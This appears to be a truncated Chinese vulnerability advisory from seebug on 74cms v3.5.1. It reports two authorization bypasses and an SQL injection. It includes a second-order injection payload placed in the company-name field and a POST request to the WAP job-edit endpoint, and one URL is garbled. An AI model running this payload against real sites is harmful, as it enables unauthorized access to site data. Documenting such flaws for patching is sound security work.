骑士人才系统 2处越权+1处sql注入获取敏感信息

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 骑士人才系统 2处越权+1处sql注入获取敏感信息 ### 详细说明: 这里我就不做代码分析了,直接看我操作 第一步,我们首先注册一个正常的企业用户 第二步,我们修改企业用户的信息 [<img src="https://images.seebug.org/upload/201410/2017122933dc98fe143d568c7e817b1e50bf691e.png" alt="16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/2017122933dc98fe143d568c7e817b1e50bf691e.png) 公司名称',`jobs_name`=user() #-- sdd 然后我们访问url: POST /74cms_v3.5.1_20141015https://images.seebug.org/upload/wap/company/wap_company_jobs.php?act=jobs_edit_save HTTP/1.1 Host: localhost postdata: id=1&add_mode=1&days=0&jobs_name=xxxxx&nature=62&nature_cn=xxxx&topclass=1&category=4&subclass=569&category_cn=xxxxx&amount=111&district=4&sdistrict=93&district_cn=xxxxx&wage=58&wage_cn=2000~3000xxxx&sex=1&sex_cn=%E7%94%B7&education=69&education_cn=xxxx&experience=75&experience_cn=xxxx&graduate=0&contents=xxxxxxxxxxxxxx&contact=xxxxxxxxxxxxxx&telephone=029-88164598 查看发布的职位信息: [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息